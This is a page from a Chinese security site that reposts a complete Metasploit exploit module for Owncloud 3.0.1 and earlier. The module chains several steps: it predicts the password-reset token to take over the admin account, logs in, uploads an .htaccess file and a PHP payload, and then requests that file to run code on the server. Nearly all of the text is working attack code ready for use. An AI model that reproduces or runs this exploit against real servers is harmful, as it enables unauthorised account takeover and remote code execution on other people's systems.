首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Owncloud Account Overtake, File Upload Code Execution
来源:http://www.metasploit.com 作者:Kupczyk 发布时间:2012-04-23  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Owncloud Account Overtake, File Upload Code Execution',
'Description' => %q{
This module exploits several vulnerabilities in Owncloud 3.0.1 and earlier in order to achieve code execution.
},
'Author' => [ 'Lukas Kupczyk luks[at]sploit.de' ],
'License' => MSF_LICENSE,
'Version' => '',
'References' =>
[
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
},
'Space' => 8000
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => '',
'DefaultTarget' => 0))

register_options(
[
OptString.new('URI', [true, "Owncloud directory path", "/owncloud"]),
OptString.new('USERNAME', [true, "The username to authenticate as", "admin"]),
OptString.new('PASSWORD', [true, "New password", "metasploit"]),
], self.class)
end

def password_reset
res = send_request_cgi({
'uri' => "#{datastore['URI']}/core/lostpassword/index.php",
'method' => 'POST',
'data' => 'user=' + datastore['USERNAME'],
})

if res.body =~ /Requested/
print_status("Triggered password reset")
else
raise RuntimeError, "Error: could not trigger password reset, does the user #{datastore['USERNAME']}
exist?"
end
end

def set_new_password(token)
res = send_request_cgi({
'uri' =>
"#{datastore['URI']}/core/lostpassword/resetpassword.php?user=#{datastore['USERNAME']}&token=#{token}",
'method' => 'POST',
'data' => "password=#{datastore['PASSWORD']}"
})

if res.body =~ /Your password was reset/
print_status("New password set")
else
raise RuntimeError, "Error: Could not set new password"
end
end

def gen_token
require 'digest/sha1'
uniqid = Time.now.to_i.to_s(16)
Digest::SHA1.hexdigest((datastore['USERNAME'].to_i + uniqid.to_i).to_s)
end

def login
res = send_request_cgi({
'uri' => "#{datastore['URI']}/index.php",
'method' => 'POST',
'data' => "user=#{datastore['USERNAME']}&password=#{datastore['PASSWORD']}",
})

if not res["Set-Cookie"]
raise RuntimeError, "Error: Login failed"
else
print_status("Logged in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
return res["Set-Cookie"]
end
end

def upload(cookie, cmdscript)
boundary = rand_text_alphanumeric(6)

data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\n"
data << ".htaccess\r\n--#{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"files[]\";
filename=\".htaccess\"\r\n"
data << "Content-Type: application/octet-stream\r\n\r\n"
data << "allow from all"
data << "\r\n--#{boundary}--"

print_status("Uploading .htaccess")
res = send_request_raw({
'uri' => "#{datastore['URI']}/files/ajax/upload.php",
'method' => 'POST',
'data' => data,
'cookie' => cookie,
'headers' =>
{
'Content-Length' => data.length,
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
}
})

if res.code != 200
print_error("Server returned non-200 status code (#{res.code})")
end

cmd_php = '<?php ' + payload.encoded + '?>'

data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\n"
data << "#{cmdscript}.php\r\n--#{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"files[]\";
filename=\"#{cmdscript}.php\"\r\n"
data << "Content-Type: application/octet-stream\r\n\r\n"
data << cmd_php
data << "\r\n--#{boundary}--"

print_status("Uploading payload")
res = send_request_raw({
'uri' => "#{datastore['URI']}/files/ajax/upload.php",
'method' => 'POST',
'data' => data,
'cookie' => cookie,
'headers' =>
{
'Content-Length' => data.length,
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
}
})

if res.code != 200
print_error("Server returned non-200 status code (#{res.code})")
end
end

def exploit
token = gen_token()
print_status("Generated token: #{token}")

password_reset()

set_new_password(token)

cookie = login()

cmdscript = rand_text_alpha_lower(20)
upload(cookie, cmdscript)

# execute our payload
res = send_request_raw({
'uri' => "#{datastore['URI']}/data/#{datastore['USERNAME']}/files/#{cmdscript}.php",
})

handler
end

end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Adobe Flash Player ActionScrip
·OpenSSL 1.0.1 Memory Corruptio
·xRadio 0.95b Buffer Overflow
·OpenSSL 1.0.1 ASN1 BIO Vulnera
·TFTP Server for Windows 1.4 ST
·Mobipocket Reader 6.2 Build 60
·WebCalendar <= 1.2.4 (install/
·VLC 2.0.1 division by zero vul
·Linux Kernel CVE-2012-0056 Loc
·OpenSSL ASN1 BIO Memory Corrup
·.NET Framework EncoderParamete
·MS11-046 Proof Of Concept
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved